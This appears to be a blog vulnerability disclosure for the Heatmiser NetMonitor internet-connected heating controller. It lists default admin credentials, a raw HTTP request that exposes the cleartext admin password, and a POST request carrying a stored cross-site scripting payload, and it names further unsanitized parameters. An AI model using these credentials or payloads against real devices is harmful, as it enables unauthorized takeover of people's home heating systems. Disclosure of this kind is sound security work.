Heatmiser NetMonitor – Multiple Vulnerabilities

“The Heatmiser Netmonitor is a self contained unit allowing you to control your heating system over the internet from any web browser. Simply plug the Netmonitor in to your router and take complete control.” (Shodan search)

Affecteed: NetMonitor 1.04, 1.1, 3.02, 3.03, 3.7, 3.8 for default creds 3.8 tested for rest

#1 Default Admin Credentials

According to the manual the default is admin / admin.

heatmiser-login

#2 Cleartext Admin Password Disclosure

GET /networkSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/left.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive

heatmiser-cleart

#3 Multiple Stored XSS (CVE-2013-78006)

Using the standard “>alert(‘DF’) XSS string the following pages are vulnerable. They require admin authentication or can exploited via cross-site request forgery (CSRF):

POST /statSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/statSetup.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive
Content-Length: 424
Content-Type: application/x-www-form-urlencoded

rdbkck=0&statname=Towel+Rails%23Utility+Room%23Kitchen%23Dining+Room%23Lounge%23Bed2+%26+En-suite%23Bed3%23″>alert(‘DF’)%23Upstairs+Rads%23Room+10%23Room+11%23Room+12%23Room+13%23Room+14%23Room+15%23Room+16%23Room+17%23Room+18%23Room+19%23Room+20%23Room+21%23Room+22%23Room+23%23Room+24%23Room+25%23Room+26%23Room+27%23Room+28%23Room+29%23Room+30%23Room+31%23Room+32&statmap=11111111100000000000000000000000

heatmiser-xss1

These pages are also affected:
/sensorSetup.htm – POST Method – snstitle, snstemp and snsalmen parameters (likely 8 more but didn’t test)
/inputSetup.htm – POST Method – inputtitle parameter
/outputSetup.htm – POST Method – outputtitle parameter

There rest of the setup pages are probably vulnerable since it didn’t seem like anything was being sanitized but I didn’t have time to check.

Advertisements

Tags: , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: